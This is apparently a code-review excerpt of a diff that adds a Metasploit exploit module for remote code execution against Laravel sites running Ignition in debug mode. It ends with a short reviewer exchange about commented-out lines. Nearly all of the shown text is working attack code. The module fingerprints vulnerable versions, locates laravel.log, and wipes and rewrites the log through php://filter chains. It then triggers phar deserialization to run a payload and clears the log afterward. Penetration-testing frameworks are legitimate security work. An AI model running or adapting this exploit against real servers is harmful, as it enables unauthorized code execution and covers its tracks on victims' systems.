modules/exploits/multi/php/ignition_laravel_debug_rce.rb

```diff
@@ -0,0 +1,226 @@
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path.to_s),
+      'method' => 'PUT'
+    }, 1)
+    # Check whether it is using facade/ignition
+    # If is using it should respond method not allowed
+    # checking if debug mode is enable
+    if res && res.code == 405 && res.body.match(/label:"(Debug)"/)
+      vprint_status 'Debug mode is enabled.'
+      # check version
+      versions = JSON.parse(
+        res.body.match(/.+"report":(\{.*),"exception_class/).captures.first.gsub(/$/, '}')
+      )
+      version = Rex::Version.new(versions['framework_version'])
+      vprint_status "Found PHP #{versions['language_version']} running Laravel #{version}"
+      # to be sure that it is vulnerable we could try to clenup the log files (invalid and valid)
+      # but it is way more intrusive than just checking the version moreover we would need to call
+      # the find_log_file method before, meaning four requests more.
+      return Exploit::CheckCode::Appears if version <= Rex::Version.new('8.26.1')
+    end
+    return Exploit::CheckCode::Safe
+  end
+
+  def exploit
+    @logfile = datastore['LOGFILE'] || find_log_file
+    fail_with(Failure::BadConfig, 'Log file is required, however it was neither defined nor automatically detected.') unless @logfile
+
+    clear_log
+    put_payload
+    convert_to_phar
+    run_phar
+
+    handler
+
+    clear_log
+  end
+
+  def find_log_file
+    vprint_status 'Trying to detect log file'
+    res = post Rex::Text.rand_text_alpha_upper(12)
+    if res.code == 500 && res.body.match(%r{"file":"(\\/[^"]+?)/vendor\\/[^"]+?})
+      logpath = Regexp.last_match(1).gsub(/\\/, '')
+      vprint_status "Found directory canditate #{logpath}"
+      logfile = "#{logpath}/storage/logs/laravel.log"
+      vprint_status "Cheking if #{logfile} exists"
+      res = post logfile
+      if res.code == 200
+        vprint_status "Found log file #{logfile}"
+        return logfile
+      end
+      vprint_error "Log file does not exist #{logfile}"
+      return
+    end
+    vprint_error 'Unable to automatically find the log file. To continue set LOGFILE manually'
+    return
+  end
+
+  def clear_log
+    res = post "php://filter/read=consumed/resource=#{@logfile}"
+    # guard clause when try to exploit a not vulnerable target (set ForceExploit true)
+    fail_with(Failure::UnexpectedReply, "Log file #{@logfile} seems doesn't exist.") unless res.code == 200
+  end
+
+  def put_payload
+    post format_payload
+    post Rex::Text.rand_text_alpha_upper(2)
+  end
+
+  def convert_to_phar
+    filters = %w[
+      convert.quoted-printable-decode
+      convert.iconv.utf-16le.utf-8
+      convert.base64-decode
+    ].join('|')
+
+    post "php://filter/write=#{filters}/resource=#{@logfile}"
+  end
+
+  def run_phar
+    post "phar://#{@logfile}/#{Rex::Text.rand_text_alpha_lower(4..6)}.txt"
+    # resp.body.match(%r{^(.*)\n<!doctype html>})
+    # $1 ? print_good($1) : nil
```

Comment:
Do we need these lines?

Reply:
Not really.  The idea of leaving this comment is for one in the future to know how to extract the output of the command executed.